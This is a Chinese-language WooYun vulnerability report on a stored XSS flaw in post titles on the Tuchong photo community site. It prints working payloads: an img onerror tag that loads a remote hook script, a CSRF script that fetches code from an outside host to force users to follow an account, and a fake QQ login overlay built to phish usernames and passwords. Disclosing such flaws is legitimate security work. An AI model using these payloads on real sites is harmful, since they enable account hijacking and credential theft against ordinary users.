WooYun.org

在图虫首页 - 讨论 选择任意一个社区 - 发帖子
在标题处 填入 xss payload （在帖子本身的界面已做过滤 在帖子综合界面没做过滤）
上图吧：
未做过滤

已做过滤的帖子本身界面：

再截图一下csrf发出去的包：

再截图一下关注者的界面：

危害不止这么一点点喔。。不要以为做了http only 就安全了。。。
xss还可以做钓鱼哦 亲~ 由于我不是真的想去钓鱼tuchong 我就拿qq空间钓鱼的模板来演示下把
上张图吧：

这个也是用html+css写出来的 稍微花点时间 改改就可以改的跟你们首页的登录框一模一样！
连接在此：http://photogear.tuchong.com/
XSS代码贴上：
<img src=x onerror=jQuery.getScript('hook Address') width=0px> (不让图片显示出来)
csrf代码贴上：
var csrf = function(){
var target="http://capa.tuchong.com/api/site/follow/";
var siteid="site_id=377467";
xss.csrf(target,siteid);
};
if('xss' in window){
csrf();
}else{
var s = document.createElement('script');
s.onload = csrf;
s.src = '//pujun.li/xss.js';
document.body.appendChild(s);
}
钓鱼代码贴上：location.href='javascript:\'<html><head></head><body><div style="position: absolute; top: 322px; left: 599px; width: 402px; height: 256px; z-index: 9999; background-image: url(http://xssreport.sinaapp.com/t/qbg.png); background-position: initial initial; background-repeat: no-repeat no-repeat;"><input type="text" style="position:absolute;top:50px;left:108px;border:none;width:197px;height:24px;line-height:24px;" id="user"><input type="password" style="position:absolute;top:92px;left:108px;border:none;width:197px;height:24px;line-height:24px;" id="pass"><div onclick="sendlogin()" style="position:absolute;top:136px;left:105px;border:none;width:101px;height:28px;cursor:pointer;"></div><img id="upic" style="display:none"></div></body></html>\'';
history.pushState({},"xxx","/cgi-bin/loginpage");